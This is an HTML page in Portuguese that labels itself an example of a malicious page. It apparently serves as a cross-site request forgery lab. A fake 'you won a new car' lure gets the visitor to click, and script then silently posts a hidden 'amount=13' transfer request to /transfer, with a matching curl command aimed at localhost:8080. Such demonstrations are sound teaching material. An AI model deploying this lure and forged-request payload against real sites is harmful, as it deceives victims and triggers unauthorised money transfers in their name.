<!DOCTYPE html>
<html>

<head>
    <title>Site XPTO</title>
</head>

<body>
    <h1>Exemplo de uma página maliciosa.</h1>
    <h1>Parabéns, você é um dos sorteados!!!</h1>
    <p>A partir de agora você está você já pode andar de carro 0 KM.</p>
    <p>Isso mesmo, não é pegadinha. Sabemos que há muitos sites maliciosos tendando enganhar pessoas de bem, mas dessa
        vez a sorte bateu a sua porta.</p>
    <p>Clique no link abaixo e você será redirecionado ao nosso Portal.</p>
    <a href="" onclick="submitPremio(event)">http://www.carrozerokm.com.br/regate-premio</a>
    <br/>
    <a href="" onclick="submitPremio2(event)">http://www.carrozerokm.com.br/regate-premio</a>


    <form id="hiddenForm" action="/transfer" onsubmit="return false" method="post" style="display: none;">
        <input type="hidden" id="amount" name="amount" value="13">
    </form>

    <div id="output"></div>

    <script>

        function submitPremio(event) {
            event.preventDefault();
            var amount = document.getElementById("amount");
            // var curl_command = "curl -X POST -H \"Content-Type: application/x-www-form-urlencoded\" -d \"amount=13\" http://localhost:8080/transfer";
            var curl_command = "curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'amount=13' http://localhost:8080/transfer";
            var xhr = new XMLHttpRequest();
            xhr.open("POST", "#", true);
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.send("curl_command=" + encodeURIComponent(curl_command));
            return false;
        }

        function submitPremio2(event) {
            event.preventDefault();
            var formData = new FormData(document.getElementById("hiddenForm"));

            var xhr = new XMLHttpRequest();
            xhr.open("POST", "/transfer", true);
            xhr.onreadystatechange = function () {
                if (xhr.readyState === XMLHttpRequest.DONE) {
                    if (xhr.status === 200) {
                        console.log("Ual, mais próximo ainda do seu carro 0 KM! Aguarde nosso contato!");
                        document.getElementById("output").innerHTML = "Ual, mais próximo ainda do seu carro 0 KM! Aguarde nosso contato!";
                        // displayBalance();

                    } else {
                        console.log("Ouve um erro em nossos sistemas, tente denovo, não deixe para depois!");
                        document.getElementById("output").innerHTML = "Ouve um erro em nossos sistemas, tente denovo, não deixe para depois!";
                    }
                }
            };
            xhr.send(formData);
        }

    </script>
</body>

</html>